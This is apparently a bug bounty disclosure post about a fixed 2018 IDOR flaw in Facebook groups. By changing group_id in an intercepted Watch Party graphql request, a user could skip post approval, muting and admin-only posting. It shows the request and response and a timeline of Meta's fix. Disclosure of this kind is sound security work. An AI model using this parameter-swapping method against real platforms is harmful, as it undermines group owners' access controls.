Bypass Admin approval, Mute Member and Posting Permissions for Only admins in Facebook groups

Introduction

While reviewing my old notes on my computer, I came across the following entry:

  • To check “Watch Party Option”

So, what exactly is the Watch Party Option?

The Watch Party Option is an innovative feature within Facebook groups that empowers not only Group admins but also regular members to select any public video on Facebook and present it simultaneously to other group members. This feature enhances the communal viewing experience by allowing members to collectively watch and engage with the chosen video. For more detailed insights into how this feature works, refer to the following link: https://globaldatinginsights.com/2018/05/02/facebook-watch-party-allows-groups-watch-videos-simultaneously

The finding

During the testing of the Watch Party functionality in Facebook groups, an Insecure Direct Object Reference (IDOR) vulnerability was identified within the “graphql” endpoint. This bug allows attackers to bypass:

  • Posting admin approval.
  • Muting a member.
  • Posting permissions restricted to admins.


Reproduction Steps

Step 1 – Victim Perspective:

  • Navigate to the group settings you own.
  • Verify the settings:
    • Post Approval: All group posts must be approved by an admin or a moderator.
    • Posting Permissions: Only admin.

Step 2 – Victim Perspective:

  • Access the group member options and mute the “Attacker” to prevent any posts in the group.

Step 3 – Attacker Perspective:

  • Go to your group.
  • Create a watch party and intercept the request. The request structure is as follows:
POST /api/graphql/ HTTP/1.1
variables={“input”:{“client_mutation_id”:”2",”actor_id”:”userID”,”composer_session_id”:”SESSIONID”,”creator_actor_id”:”actorID”,”custom_name”:null,”group_id”:”AttackerGroupID",”video_ids”:[“VIDEO-ID”]}}&doc_id=doc-id

Step 4 – Attacker Perspective:

  • Change the value of “group_id”: “AttackerGroupID” to the victim group ID and forward the request. The response will be similar to:
{
  "data": {
    "group_living_room_create": {
      "client_mutation_id": "2",
      "living_room": {
        "__typename": "LivingRoomSession",
        "id": "199255894011111"
      }
    }
  }
}

where “id”: “199255894011111” is the LivingRoomSession ID.

Step 5 – Attacker Perspective:

Timeline

Sarmad | 03 Jun 2018

  • Initial Report

Meta Bug Bounty | 14 Jun 2018

  • Report Triaged

Meta Bug Bounty | 27 Jun 2018

  • Fixed the first two impacts

Meta Bug Bounty | 17 Jul 2018

  • Complete Fix

Sarmad | 18 Jul 2018

  • Fix Confirmed

Meta Bug Bounty | 18 Jul 2018

  • Bounty Awarded

POC


Posted

in

,

by

Tags: